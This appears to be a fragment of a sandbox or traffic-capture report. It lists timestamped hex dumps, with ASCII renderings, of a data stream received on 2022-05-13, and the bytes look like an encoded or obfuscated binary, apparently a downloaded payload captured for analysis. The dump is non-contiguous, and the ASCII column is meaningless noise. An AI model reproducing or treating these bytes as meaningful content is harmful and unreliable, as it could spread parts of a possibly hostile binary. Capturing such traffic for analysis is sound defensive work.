                                            2022-05-13 15:19:06 UTC424INData Raw: 02 c6 ae 1a ac 39 39 c5 7f ce 16 c5 09 49 f1 7f c2 2c 80 ae 3d ae 7b ac 39 39 99 24 95 c5 1f 97 88 d2 c6 8d 1c c5 8e 49 f1 fb bd a6 3d bf 86 af 5b 49 f1 13 c5 fd 84 2a c6 c6 c6 6d 98 31 bc bf 98 af da c5 fd f3 56 3b c6 c6 6d 98 31 2b bf 98 3a 3f 6d 86 24 95 fd 76 3b 24 95 fd c7 06 c6 8f c5 b2 bd 8a ba 8d 1c 91 c5 13 c5 c0 c5 b6 8c 7f 39 c6 c5 8c ae 70 39 39 39 bd a6 b9 c7 ca 06 c7 ca ff ae 06 08 c6 c3 7f be 2c bd c4 3b 49 48 54 c6 c6 c6 2c bb c4 49 61 49 c1 bd c6 c6 c6 2c bd 39 3b 38 b7 2c bd 39 d2 b1 b1 2c bd 35 3b 38 ab 49 f1 01 c5 8f be 2c 75 22 08 c4 b1 2a 49 f1 01 0e bf 86 44 4b f3 3b c6 c6 c6 c5 8f be 2c 3d 22 10 c4 7b 0e af ba 49 f1 94 83 c5 fb 84 2a c6 c6 c6 d3 31 c4 a3 2b a7 3b c6 c6 c5 0b bf 98 b3 3d bd 88 3d fb c0 c8 3d b8 65 b6 c5 fb f3 56 3b
                                            Data Ascii: 99I,={99$I=[I*m1V;m1+:?m$v;$9p999,;IHT,IaI,9;8,9,5;8I,u"*IDK;,="{I*1+;===eV;
                                            2022-05-13 15:19:06 UTC432INData Raw: 16 c7 0a ea 12 16 30 c6 ae 40 76 39 39 bb 8a 0a ca c6 c6 fd c6 c6 c6 39 39 39 39 c8 c6 c6 c6 47 d0 c6 c6 8d 1c 91 4a 98 3a ce bd 8a b6 ae 4b 46 39 39 c5 2b c5 a0 c5 be c7 81 ca c5 9c ae c7 c3 39 39 c5 01 4a 15 3a 49 ae 14 46 39 39 2a c9 3f c6 c6 c6 c6 bd 8a d2 c5 01 99 24 95 fd c5 86 8f c5 b2 30 c6 8d 1c 91 4a 98 3a ce bd 8a b6 ae 96 b9 39 39 c5 2b c5 a0 c5 be 6d 86 8f 2e 88 7e 06 c6 2a 39 f6 2a c3 e6 c7 7f c2 16 c5 8f d2 c5 87 ce c5 8c ae dd 0f 39 39 c5 8f c2 c7 81 ca ae f2 c3 39 39 6d 86 20 93 93 2a c3 d6 2e 03 7e 06 c6 c7 7f c2 ae fd 4e 39 39 fd 23 53 48 39 39 25 b6 c5 01 4a 15 3a 49 ae 96 b9 39 39 2a c9 3f c6 c6 c6 c6 bd 8a d2 c5 01 99 24 95 93 97 88 ce c6 8d 1c 91 4a 98 3a ce bd 8a b6 ae 8f b9 39 39 c5 2b c5 a0 c5 be c7 91 ca c5 8c ae 17 6e 39 39 c5
                                            Data Ascii: 0@v999999GJ:KF99+99J:IF99*?$0J:99+m.~*9*9999m *.~N99#SH99%J:I99*?$J:99+n99
                                            2022-05-13 15:19:06 UTC440INData Raw: 06 c6 2a 39 f6 2a c3 e6 39 3f 72 a1 08 c6 6d 86 20 93 93 2a c3 d6 2e f2 9e 06 c6 fd 23 7c 28 39 39 25 be 97 fd c5 86 bd 67 72 a1 08 c6 3b fd 39 5f 36 ad 08 c6 c5 86 39 5f 32 ad 08 c6 c5 86 39 5f 2e ad 08 c6 c5 86 39 5f 2a ad 08 c6 c5 86 39 5f 26 ad 08 c6 c5 86 8f c5 b2 bb b7 d6 c6 ca c6 c6 3a 41 7e 3b 06 c6 46 25 51 2c c5 7f de 16 2c c5 7f da 16 c5 7f d2 16 c5 7f ce 16 ae 94 39 39 39 97 88 da c6 c5 86 8f c5 b2 7e 3b 06 c6 46 97 88 ce c6 8f c5 b2 7e 3b 06 c6 46 97 88 d2 c6 8f c5 b2 7e 3b 06 c6 46 97 88 d6 c6 8f c5 b2 30 c6 8d 6d 86 8f 2e d4 13 06 c6 2a 39 f6 2a c3 e6 bb b7 d2 c6 ca c6 c6 3a 41 f5 3b 06 c6 46 25 e6 c7 7f c2 c5 8f ce ae 63 a5 39 39 c5 7f c2 c5 8f da ae e4 70 39 39 bd a6 b9 c5 e2 bf e6 0a 08 c6 6d 86 20 93 93 2a c3 d6 2e 4f 13 06 c6 c7 7f c2
                                            Data Ascii: *9*9?rm *.#|(99%gr;9_69_29_.9_*9_&:A~;F%Q,,999~;F~;F~;F0m.*9*:A;F%c99p99m *.O
                                            2022-05-13 15:19:06 UTC448INData Raw: 1c 91 8f 8b c5 2b c5 a0 c5 be 2c c5 65 2c bb 37 3b 3b af 47 c5 0d c5 01 c5 94 ae 8a 37 39 39 25 7d c5 9a c5 ff ae 2f 22 c6 c6 4a 86 3a d6 1c c5 05 c5 11 c5 0a ea ca c5 de 39 8d e2 25 ec c5 9a c5 8c ae 9e 22 c6 c6 4a 86 3a d4 c5 05 c5 11 c5 ca ea c5 de 39 8d de 25 45 c5 0d c5 01 c5 94 ae 55 39 39 39 20 97 99 24 95 fd 56 8d 1c c5 a0 c5 b6 2c c5 3d 49 f1 96 75 90 af d2 c5 0d c5 8c ae d5 c0 39 39 24 95 fd 2c 77 d2 06 af 4b c5 7d ce c5 96 c5 8c ae 98 39 39 39 23 2d 3b c6 c6 c5 0b bd c0 da 49 c1 80 3b c6 c6 39 ea cf f3 be 06 c6 47 33 06 c6 fe 33 06 c6 0a 33 06 c6 93 33 06 c6 34 33 06 c6 4e 33 06 c6 68 33 06 c6 82 33 06 c6 9c 33 06 c6 1c c0 06 c6 32 c0 06 c6 aa 33 06 c6 32 c0 06 c6 9b c0 06 c6 32 c0 06 c6 32 c0 06 c6 33 33 06 c6 d4 c0 06 c6 e6 c0 06 c6 f8 c0 06
                                            Data Ascii: +,e,7;;G799%}/"J:9%"J:9%EU999 $V,=Iu99$,wK}999#-;I;9G333343N3h3332322233
                                            2022-05-13 15:19:06 UTC456INData Raw: ba ae 5f f6 39 39 fd 23 05 e8 39 39 25 1d 17 7f be 95 c5 1f 97 fd 56 8f c5 b2 bd 8a ae 8d c5 9e c7 7f ae 16 ae cc 86 39 39 2c 01 7f ae 3f c6 c5 7f ce c3 7f b6 c5 7f d2 c3 7f ba 30 41 30 c6 2e c6 ca c6 c6 c7 7f ae 16 c7 7f ae 16 db 3a 18 08 c6 c5 c6 39 96 2c c5 4d 2c f3 41 c6 ae a4 0d 39 39 c5 7f b6 c3 7f be c5 7f ba c3 7f c2 17 7f be 95 c5 1f 97 88 ce c6 8d bd 8a ae c5 9e c7 0a ea ce 16 ae 6e f9 39 39 30 41 30 c6 2e c6 ca c6 c6 8d c7 0a ea de 16 db 3a 18 08 c6 c5 c6 39 96 2c c5 4d 2c f3 41 c6 ae 5a 0d 39 39 c5 0a ea d6 c3 ca ea c5 0a ea da c3 0a ea ca 17 ca ea bd 8a de 95 fd 56 8f c5 b2 bd 8a ae 8d c5 9e c7 7f ae 16 ae 20 f9 39 39 6d 86 8f 2e 5b 53 7b c6 2a 39 f6 2a c3 e6 c5 0d c7 7f ae ae f8 a0 39 39 c7 7f ae 39 4f ea 2e 08 c6 c7 7f ae ae af c6 c6 c6 17
                                            Data Ascii: _99#99%V99,?0A0.:9,M,A99n990A0.:9,M,AZ99V 99m.[S{*9*999O.
                                            2022-05-13 15:19:06 UTC464INData Raw: 39 39 39 41 c6 c6 c6 08 a9 a9 32 9f 9b 34 c6 39 39 39 39 41 c6 c6 c6 1c 9b 38 a3 9b 34 3a c6 39 39 39 39 41 c6 c6 c6 8f 34 a5 34 a9 b1 34 c6 39 39 39 39 41 c6 c6 c6 0a 9f 9d a3 a7 9b 32 c6 39 39 39 39 3d c6 c6 c6 ea f6 0c c6 39 39 39 39 ce c6 c6 c6 8d 2e a9 38 3a 83 34 3a c6 c6 c6 c6 39 39 39 39 ca c6 c6 c6 08 b3 3a 9f c6 c6 c6 c6 39 39 39 39 ca c6 c6 c6 91 a9 38 2a c6 c6 c6 c6 39 39 39 39 ce c6 c6 c6 12 a9 34 a1 91 a9 38 2a c6 c6 c6 c6 39 39 39 39 3f c6 c6 c6 83 34 3a fc fa c6 c6 c6 8f c5 b2 bb 8a be 37 39 39 8d 1c 91 6d 03 c3 c7 be 37 39 39 c5 b8 c5 9e 6d 86 8f 2e 98 73 7b c6 2a 39 f6 2a c3 e6 c5 35 2c bb 21 39 49 2c bd 39 da b1 dc c5 8c 49 f1 11 c5 da cf 16 0a 08 c6 ae ae ce 39 39 23 64 c6 c6 c6 2c bb 35 c6 3b af 4b c5 8c 80 ae 73 7b c6 ae 96 ce 39 39
                                            Data Ascii: 999A249999A84:9999A4449999A29999=9999.8:4:9999:99998*999948*9999?4:799m799m.s{*9*5,!9I,9I99#d,5;Ks{99
                                            2022-05-13 15:19:06 UTC472INData Raw: f6 2a c3 e6 39 3f 1a 2e 08 c6 6d 86 20 93 93 2a c3 d6 2e ee 1e 7b c6 fd 23 80 a8 c4 39 25 be 97 fd c5 86 bd 67 1a 2e 08 c6 3b fd 46 1e 7b c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 46 1e 7b c6 d2 c6 c6 c6 8e 38 06 c6 d6 fe 06 c6 e2 fe 06 c6 e6 fe 06 c6 ea fe 06 c6 de fe 06 c6 46 6f 06 c6 62 6f 06 c6 9e 6f 06 c6 43 7f 89 32 9f 7f 38 38 a9 38 c5 86 9e 1e 7b c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 9e 1e 7b c6 d6 c6 c6 c6 fa 1e 7b c6 d6 fe 06 c6 e2 fe 06 c6 e6 fe 06 c6 ea fe 06 c6 de fe 06 c6 46 6f 06 c6 62 6f 06 c6 9e 6f 06 c6 d2 7f 89 32 9f 8d b3 ad 7f 38 38 a9 38 c7 06 c6 fa 93 7b c6 c6 c6 c6 c6 c6 c6 c6 c6 fa 93 7b c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6
                                            Data Ascii: *9?.m *.{#9%g.;F{F{8FobooC2888{{{Foboo2888{{
                                            2022-05-13 15:19:06 UTC480INData Raw: 2a c3 e6 c7 87 c2 c5 9c c5 fd ae ba c6 c6 c6 c5 8f c2 c5 01 ae b0 05 c4 39 6d 86 20 93 93 2a c3 d6 2e 79 3e 7b c6 c7 7f c2 ae 37 09 c4 39 fd 23 dd 88 c4 39 25 b6 99 24 95 93 97 fd c7 06 c6 8f c5 b2 30 c6 8d 1c 91 c5 33 c5 b8 c5 9e 6d 86 8f 2e 56 3e 7b c6 2a 39 f6 2a c3 e6 c7 7f c2 c5 11 ae d8 0b c4 39 c5 87 c2 c5 9c c5 fd ae 40 3b c6 c6 6d 86 20 93 93 2a c3 d6 2e d1 3e 7b c6 c7 7f c2 ae df 09 c4 39 fd 23 85 88 c4 39 25 b6 99 24 95 93 97 fd c7 06 c6 8d c5 13 c5 d0 c5 43 50 43 46 23 3f 3a 45 46 23 3f 3a 49 c4 03 3a da 25 55 c5 05 ae 06 c4 39 39 95 fd c5 05 ae e1 c4 39 39 95 fd c5 05 ae e4 39 39 39 95 fd c5 fd ae e3 8e c4 39 95 fd c7 06 c6 8d c5 e0 c5 55 50 55 46 25 3f 3a 45 46 25 3f 3a 47 c4 05 3a d6 25 4d ae f2 c4 39 39 95 fd ae e7 c4 39 39 95 fd ae 04 39
                                            Data Ascii: *9m *.y>{79#9%$03m.V>{*9*9@;m *.>{9#9%$CPCF#?:EF#?:I:%U99999999UPUF%?:EF%?:G:%M99999
                                            2022-05-13 15:19:06 UTC488INData Raw: bf 86 3a 49 39 7f be 39 87 b6 af 6a 01 7f be 39 39 39 39 6d 86 20 93 93 2a c3 d6 2e 0c 5e 7b c6 c7 7f ae 80 c8 c6 c6 c6 ae 38 e3 c4 39 c7 7f ba ae 0c e3 c4 39 fd 23 62 68 c4 39 25 1d c5 7f be 24 95 c5 1f 97 fd 56 8d 1c 91 8f c5 b0 c5 be c5 01 c5 d6 39 18 da c5 9e 85 bf 15 42 da 7d 6d bc c5 9c c5 01 c5 ce 39 8b de 75 ae 3a 41 0c 85 af 29 bd 94 39 c5 8c 97 99 24 95 fd 8f c5 b2 8b 8d 1c 91 c3 87 c2 c5 c0 c5 b6 c5 87 c2 c5 11 c5 8c c5 de 39 8d 26 c5 87 ce c5 11 c5 8c c5 de 39 8d ea 99 24 95 93 97 88 ca c6 c5 86 8f c5 b2 8b 1c c5 b6 30 e6 c5 90 db 0e c1 7b c6 78 3b ae 0b d4 c6 c6 c3 7f c2 6d 86 8f 2e c2 5e 7b c6 2a 39 f6 2a c3 e6 c5 8f c2 c5 8c c5 ce 39 8b 32 6d 86 20 93 93 2a c3 d6 2e 3d d3 7b c6 c5 7f c2 ae 27 62 c4 39 fd 23 19 db c4 39 25 b6 24 93 97 fd 56
                                            Data Ascii: :I99j9999m *.^{899#bh9%$V9B}m9u:A)9$9&9$0{x;m.^{*9*92m *.={'b9#9%$V
                                            2022-05-13 15:19:06 UTC496INData Raw: c6 25 77 01 7f b2 3d c6 c6 c6 25 fa 01 7f b2 ca c6 c6 c6 25 65 01 7f b2 3f c6 c6 c6 25 e8 01 7f b2 cc c6 c6 c6 25 53 01 7f b2 41 c6 c6 c6 25 d6 01 7f b2 ce c6 c6 c6 25 41 01 7f b2 43 c6 c6 c6 c5 90 46 1b 86 46 33 86 3a 59 bb a8 39 c6 c6 c6 fb b0 3d bd a8 41 c5 87 b2 fb 1b c8 c7 d2 07 d2 83 08 c6 49 f1 d2 8b 25 e4 bb a8 39 c6 c6 c6 fb b0 3d bd a8 41 c5 87 b2 fb 1b c8 c7 d2 07 d2 83 08 c6 49 f1 12 8b d6 bb 1b c6 d2 c6 c6 bb 23 c6 ca c6 c6 3a d8 bb 23 c6 ca c6 c6 3a 4d bb 23 c6 ca c6 c6 3a dc 25 e2 c5 7f c2 06 c3 7f c2 25 24 c5 7f c2 bd 86 c8 c3 7f c2 25 8d 3d b7 c2 c3 b7 c2 25 85 2c 67 60 c6 3a 4f bd 86 c0 2c bd ae ca 38 e8 2c bd ae ea 3a 4b 2c bd ae e8 af f6 3d b7 c2 bd 01 c8 c3 b7 c2 25 5f c5 7f c2 bd 86 3d c3 7f c2 25 e0 46 b7 35 c6 3a 45 c5 7f c2 bd 86
                                            Data Ascii: %w=%%e?%%SA%%ACFF3:Y9=AI%9=AI#:#:M#:%%$%=%,g`:O,8,:K,=%_=%F5:E
                                            2022-05-13 15:19:06 UTC504INData Raw: 01 3f c6 c6 c7 af a2 c7 b5 ca f3 ce c6 c6 c6 2d df 2c df 6d 86 20 93 93 2a c3 d6 2e 73 9e 7b c6 c7 7f 9e ae 8d a3 c4 39 fd 23 e3 28 c4 39 25 b6 99 24 95 c5 1f 97 fd 49 f9 98 ae 56 39 39 39 fd c7 06 c6 8f c5 b2 39 af d2 39 af ce bd 86 ca f3 ca c6 c6 c6 80 e6 c6 c6 c6 ae d3 6b c6 c6 97 88 ce c6 56 8d 1c 91 4a 98 3a ce bd 8a b6 ae 0b 99 c4 39 c5 2b c5 a0 c5 be 6d 98 c5 01 ae f4 97 c4 39 c7 91 ca c5 8c f3 e8 c6 c6 c6 ae 35 8d c4 39 c5 01 4a 15 3a 49 ae c6 26 c4 39 2a c9 3f c6 c6 c6 c6 bd 8a d2 c5 01 99 24 95 fd 8f c5 b2 bd 8a 72 8d 1c 91 6d 15 c3 97 72 c3 97 76 c3 97 7a 4a 98 3a ce bd 8a b6 ae 3e 99 c4 39 c5 13 4e 8f 39 c5 be c5 af ce 6d 86 8f 2e bf 13 7b c6 2a 39 f6 2a c3 e6 2c bf 15 3a 45 2c bd 35 06 b1 3f 2c 75 a4 ad 4f c7 8f 7a db 66 8b 08 c6 ae 15 4e c4
                                            Data Ascii: ?-,m *.s{9#(9%$IV99999kVJ:9+m959J:I&9*?$rmrvzJ:>9N9m.{*9*,:E,5?,uOzfN
                                            2022-05-13 15:19:06 UTC512INData Raw: dd 3f 76 10 08 c6 38 aa c5 7f ba 46 fe 67 af d0 8c 7f c4 3b 2c bf 15 3c 3b 85 c5 7f ba 50 c6 02 67 3a ca 02 65 af 3d 39 7f ba c7 0c c8 c3 7f be c5 7f be 6d 03 80 e6 c6 c6 c6 ae 82 71 c4 39 c5 7f ba 46 fe f6 af 43 39 7f ba 2c bf 15 3c 3b 85 c5 7f ba ae 75 56 c4 39 c5 be 2c bd 39 06 3c 51 2c bf 15 3c d2 2c bd 35 06 b1 cc 2c f9 06 c6 25 cc c5 01 4e cc 25 18 2c bf 39 3c d6 c5 7f be 16 c5 7f ba 16 91 ae ef 37 39 39 25 41 8c cc d0 8c 0c 3b c8 2c bf 15 3c 57 c5 01 c5 96 10 4e dc 46 b7 c4 c6 3a 43 f0 fd ca 46 4e 0c 3b 25 55 f0 fd 4e 0c 3b 25 da c5 01 4e cc 46 b7 c4 c6 3a cc 8c 0c 3b 46 25 ca 8c 0c 3b c6 6d 86 20 93 93 2a c3 d6 2e 29 be 7b c6 c7 7f b6 ae d7 0e c4 39 fd 23 2d 7b c4 39 25 b6 50 7f 39 99 24 95 c5 1f 97 fd c6 c6 c6 39 39 39 39 3b c6 c6 c6 f6 c6 c6 c6
                                            Data Ascii: ?v8Fg;,<;Pg:e=9mq9FC9,<;uV9,9<Q,<,5,%N%,9<799%A;,<WNF:CFN;%UN;%NF:;F%;m *.){9#-{9%P9$9999;
                                            2022-05-13 15:19:06 UTC520INData Raw: 8f 2e 1d de 08 c6 2a 39 f6 2a c3 e6 c7 7f b6 c5 8f c2 ae c2 63 c4 39 c7 7f b2 c5 8f be ae 2b 63 c4 39 c7 7f ae c5 8f c2 ae ac 63 c4 39 c5 8c ae 81 63 c4 39 25 b9 c5 8f b6 c5 7f b2 ae a8 f4 c4 39 c5 9e bf 15 af d2 c5 8c c5 8f ae ae b8 65 c4 39 25 32 39 fc c7 7f aa 16 c5 05 83 80 3b c6 c6 c6 c5 7f ae ae f8 f4 c4 39 39 af aa 39 af ba c5 8c 80 3d c6 c6 c6 ae 46 f2 c4 39 c7 7f ae 16 c5 7f be ae 7a 65 c4 39 c5 96 3d 0d f3 39 39 39 b9 c5 7f ae ae 3d f4 c4 39 c7 7f b6 16 c5 7f b2 ae d1 65 c4 39 c5 96 3d 0d f3 39 39 39 b9 c5 7f b6 ae ac 67 c4 39 bd b7 b6 c6 49 bf b1 39 39 39 6d 86 20 93 93 2a c3 d6 2e b0 de 08 c6 c7 7f aa 80 41 c6 c6 c6 ae 8c ee c4 39 fd 23 be 5b c4 39 25 25 24 95 c5 1f 97 88 ca c6 c5 86 8f c5 b2 bd 8a be c3 8f be c3 7f c2 c5 7f c2 ae f2 67 c4 39
                                            Data Ascii: .*9*c9+c9c9c9%9e9%29;999=F9ze9=999=9e9=999g9I999m *.A9#[9%%$g9
                                            2022-05-13 15:19:06 UTC528INData Raw: 39 39 39 3f c6 c6 c6 9f a7 a9 38 b3 c6 c6 c6 39 39 39 39 c8 c6 c6 c6 9b 34 c6 c6 39 39 39 39 3d c6 c6 c6 9b 2a 3c c6 39 39 39 39 3d c6 c6 c6 9b 36 a3 c6 39 39 39 39 3d c6 c6 c6 7d 38 b3 c6 39 39 39 39 ca c6 c6 c6 36 3a 1c 9f c6 c6 c6 c6 39 39 39 39 ca c6 c6 c6 a1 34 9b 3a c6 c6 c6 c6 39 39 39 39 c8 c6 c6 c6 6d f8 c6 c6 39 39 39 39 cc c6 c6 c6 38 a3 2c b3 8d a3 c6 c6 39 39 39 39 ca c6 c6 c6 af 38 9f 7b c6 c6 c6 c6 39 39 39 39 c8 c6 c6 c6 b1 af c6 c6 0a 32 32 7d 9b 34 8f 34 32 a9 9b 2a 14 a9 b1 c6 0a 32 32 81 9f 3a 7d 32 9b ad ad 89 28 30 9f 9d 3a c6 c6 c6 0a 32 32 18 9f a1 a3 ad 3a 9f 38 8d 9f 38 3c 9f 38 c6 c6 c6 0a 32 32 8f 34 38 9f a1 a3 ad 3a 9f 38 8d 9f 38 3c 9f 38 c6 39 39 39 39 3b c6 c6 c6 38 c6 c6 c6 39 39 39 39 3b c6 c6 c6 af c6 c6 c6 39 39 39 39
                                            Data Ascii: 999?8999949999=*<9999=69999=}899996:99994:9999m99998,99998{999922}442*22:}2(0:22:88<82248:88<89999;89999;9999
                                            2022-05-13 15:19:06 UTC544INData Raw: fe 95 fe 99 fe 9d fe a1 fe a5 fe a9 fe ad fe b1 fe b5 fe b9 fe bd fe c1 fe c5 fe c9 fe cd fe d1 fe d5 fe d9 fe dd fe e1 fe e5 fe b9 00 23 00 c6 75 53 75 1a 75 ab 75 df 75 84 75 0f 75 d6 02 75 02 44 02 d5 02 0b 02 27 02 2b 02 2f 02 33 02 37 02 3b 77 3f 77 43 77 47 77 4b 77 4f 77 53 77 57 77 5b 77 5f 77 63 77 67 77 6b 77 6f 77 73 77 77 77 7b 77 8d 77 a5 77 a3 79 a7 79 ab 79 af 79 b3 79 b7 79 bb 79 bf 79 c3 79 c7 79 cb 79 cf 79 d3 79 d7 79 db 79 df 79 e3 79 e7 79 eb 79 ef 79 f3 79 f7 79 c6 f6 3b c6 0a c6 c6 c6 cb 6b 5f f8 04 f8 a3 f8 fd f8 57 6d b5 6d 90 6d 4f fa 5d fa 91 fc 44 fc 8e fe 21 fe 39 fe 51 73 4c 73 d7 73 76 73 88 73 42 00 fd 00 98 00 b6 00 f6 77 93 77 fb 77 69 04 f6 79 d1 79 c6 06 3b c6 82 c6 c6 c6 ce 6b 96 6b 50 f8 d3 f8 e1 f8 47 6d 10 6d c9 6d
                                            Data Ascii: #uSuuuuuuuD'+/37;w?wCwGwKwOwSwWw[w_wcwgwkwowswww{wwwyyyyyyyyyyyyyyyyyyyyyy;k_WmmmO]D!9QsLssvssBwwwiyy;kkPGmmm
                                            2022-05-13 15:19:06 UTC560INData Raw: ca 46 fc 8d db 62 a3 17 7a 31 01 30 3b 40 25 1d 0a 7a 6c 70 e4 6f e5 54 ed ec 8b 15 5e 4f 7f 34 44 8f 50 98 a4 af a0 68 bc e3 14 1a a9 44 47 ba 3c ed cd ce d9 a2 3f 19 9c 22 09 ee f1 4b 63 a7 99 8e ac 47 40 3f 64 a5 6b 74 e8 2b 95 9d c7 fc 0d c5 2b 3e bc 03 1a 8a f4 bb d2 1a 29 67 72 75 f0 97 33 3d 34 cd 23 4a 15 79 83 e2 57 e7 e6 a7 a3 8d ac bd 7b c9 48 e4 f1 43 f0 25 11 0d 80 e2 b0 b8 b2 58 3d 44 00 6f cc 78 76 4b 3b 80 1a 41 e3 b6 8b b6 17 ef b5 a2 3a de 8e 94 c7 9b 53 a0 c8 1d 3e 06 22 72 f7 32 43 70 5a 1f 29 4f 2c f3 bd 09 66 2e ca ec 95 f4 aa 95 57 51 58 24 6e 68 e6 af ec 7f 49 f0 8f 40 7b be d8 f5 7b d2 90 99 b5 e6 85 b7 88 a2 77 74 9c b7 67 29 f0 bc 69 24 7c d4 41 1e 38 50 12 df db ad a6 25 5c bf 2d 3f 8f d6 68 8c 77 44 b7 c5 36 fd 47 a1 4b c2 a2
                                            Data Ascii: Fbz10;@%zlpoT^O4DPhDG<?"KcG@?dkt++>)gru3=4#JyW{HC%X=DoxvK;A:S>"r2CpZ)O,f.WQX$nhI@{{wtg)i$|A8P%\-?hwD6GK
                                            2022-05-13 15:19:06 UTC576INData Raw: 6c 28 f0 d7 59 bd ba b7 58 7a 5d 26 42 c1 49 5f d0 2d d3 12 62 93 bc 7f fb 2e e8 25 29 88 dd f4 fc f7 a3 32 82 f1 f8 dd 03 8c f0 05 ef 18 3e 1a 41 8f 54 f3 fe c9 20 aa 77 f8 ba d9 f1 ce 0f f7 dc 47 e6 2c f4 97 34 8c 0c ee 54 f9 2b 44 f1 9c f5 b6 da 02 34 ab e0 9a 25 ab be ba 01 4e 29 e9 08 f0 d6 fe 46 cd 99 88 92 7c 30 08 5a 51 0f c9 e2 c9 b1 bd 32 1f 03 ed 7d d4 16 45 57 5b dc 77 79 f4 82 f0 ec da 1a fc 33 71 99 d4 eb 09 1d 03 69 9c 78 6f 2e 54 dc f2 d1 f2 38 bb 88 54 a7 74 53 20 3a a4 54 74 8e af d5 2c 7b 39 ca 9a 61 6e 5a 38 77 cf c5 1f 74 51 66 1d c7 35 c1 e4 f1 59 03 25 b9 ec e2 c2 cd 75 6e 8f 2f 61 59 71 83 25 eb 7d d1 09 58 20 d2 55 0b d8 4a 96 bd 34 39 8f ba c0 97 bf 89 fa 4c ca 5a 42 c9 4d d8 f3 cf 29 b3 b2 6d d7 ee 6d e9 b9 01 de 6e 1a 1b b4 c0
                                            Data Ascii: l(YXz]&BI_-b.%)2>AT wG,4T+D4%N)F|0ZQ2}EW[wy3qixo.T8TtS :Tt,{9anZ8wtQf5Y%un/aYq%}X UJ49LZBM)mmn
                                            2022-05-13 15:19:06 UTC592INData Raw: f1 62 56 04 36 93 09 03 a7 78 1a ef 0f ea 6a c5 9f da ac 9d 04 9f 24 2d f3 c9 19 91 bc 3f fd 60 26 ea b6 f0 75 72 06 b6 b3 01 23 fb 9b 1e 29 e8 0a 7e 25 bd 42 2c 87 c1 73 25 89 f9 44 d8 da 86 e0 2c 8a 99 7f f3 65 7e e6 7c 31 a1 5f 24 39 06 62 9b 10 a8 2b 10 75 d5 f6 41 8f 60 6c 13 7c 4a d6 49 5b bd 0c 1e a7 c6 68 fb b4 fc 51 f6 58 60 48 c6 b0 23 71 85 3a c0 c9 e9 7c 24 ba 69 e3 21 6b 18 29 f8 b1 f5 79 2f ee cc a0 a2 11 72 8d cd 1e 2f 4c 8f 8c cb ca 2b a5 b5 e6 9e 94 63 39 e3 9d 73 d8 38 b2 87 e0 40 cb 7c dc 6b 90 e8 67 29 2b 82 d8 ba 3e 95 63 fa 55 2a 80 ef d7 e7 8a f2 45 2a d9 2c 9d 5f 43 52 ee 89 5e b0 76 4f 51 50 5e f9 21 46 f4 d3 df fd 34 93 bb 66 1d 43 ea 6c 28 e8 24 ef 09 2a 50 a6 54 88 52 76 07 d5 fc 24 33 6e cd 93 e9 cb d3 f6 8b f2 f8 4c e1 b4 81
                                            Data Ascii: bV6xj$-?`&ur#)~%B,s%D,e~|1_$9b+uA`l|JI[hQX`H#q:|$i!k)y/r/L+c9s8@|kg)+>cU*E*,_CR^vOQP^!F4fCl($*PTRv$3nL
                                            2022-05-13 15:19:06 UTC608INData Raw: c6 ee 97 ba 90 09 26 d4 b3 ae 86 f4 39 1e 8f 3d cf fb a3 fb 9a dc c8 81 88 a3 41 8a d2 c8 32 61 44 33 07 97 3c ff 1e a6 0d 83 6c c3 53 51 40 ee af 36 c5 3d e4 5c e4 41 41 ce 89 51 f2 25 5d 58 0b 88 a7 49 62 8a 2a c1 fb 5f 61 5d 10 06 95 2a 97 b1 9a a2 1c 34 ff bf e0 4d bb 37 3f 4d 1c 59 f6 40 5f 40 c5 0a 92 16 36 54 11 c3 21 28 46 cc 3f bd b0 3c e0 c5 be a9 07 8c 64 b1 e8 4d 36 13 21 86 d6 a2 f4 4b 65 c0 d8 16 59 46 90 d9 ec 3e c6 b7 03 1d a2 4f ff 78 b3 41 42 ae e2 ec 88 8c 54 31 a5 94 9c c4 45 14 86 30 e6 a0 21 e4 b1 a2 69 2b 8a 8f 63 9e e6 0a c3 c6 c8 c7 ae 52 4b 59 ee af a9 5d c9 53 c8 c5 3b 41 49 d0 10 45 3e e4 31 09 5f 3f bb 0b 32 c7 8e 3a 5f b3 55 fa 8f 8b 65 f3 18 a1 18 32 a0 b7 af b5 38 b8 ed 6a c1 ca 3f d9 23 ca e2 a5 3f 3c b7 38 b7 58 a9 fb 9c
                                            Data Ascii: &9=A2aD3<lSQ@6=\AAQ%]XIb*_a]*4M7?MY@_@6T!(F?<dM6!KeYF>OxABT1E0!i+cRKY]S;AIE>1_?2:_Ue28j?#?<8X
                                            2022-05-13 15:19:06 UTC624INData Raw: 3e 14 f6 6b 2c 20 9b ce 7c b3 53 a9 de e1 49 52 f9 d2 8d b3 f4 69 9f fd a3 c9 fd f6 8a ea 44 5b 95 05 a1 5b fb 1c c6 92 b3 61 ee 2b 8c a1 54 8c a1 b7 8a 9e 38 88 30 75 82 03 5d 4a e0 50 d7 75 61 39 c4 40 3f dc 50 51 63 3b 58 35 a5 c3 8a 0d 69 3b 36 33 9a f6 cd 07 9f 3b 50 92 d9 2d b1 90 a0 ee 1e 19 24 98 86 e6 3d 9a b7 5f b1 ad a4 37 57 0f 38 b1 40 b5 88 93 11 88 b4 e0 40 24 da 88 59 ad 19 8a 63 a4 9b 8e 7b 6d 56 41 61 ca 64 c2 8c 38 3d fc ff 1c 1e 13 9f d4 bd 09 46 1b 2e 19 8a af 30 01 69 9c 26 bf 53 6b 8a e0 cc 59 f6 bd 98 61 3c ac 5f 6f 9b a3 c5 03 e8 e8 5d 7d 88 78 40 ee 27 ae 12 9d b7 5d ee 06 74 70 34 67 92 7a a5 1e 64 a2 40 36 31 07 00 93 22 5f 61 ee 0a 90 eb a3 32 47 38 37 20 d7 07 2f 3d 8e 36 f6 c0 e0 85 9b 63 b5 40 0a 76 84 1a 61 01 f5 a1 b1 f4
                                            Data Ascii: >k, |SIRiD[[a+T80u]JPua9@?PQc;X5i;63;P-$=_7W8@@$Yc{mVAad8=F.0i&SkYa<_o]}x@']tp4gzd@61"_a2G87 /=6c@va
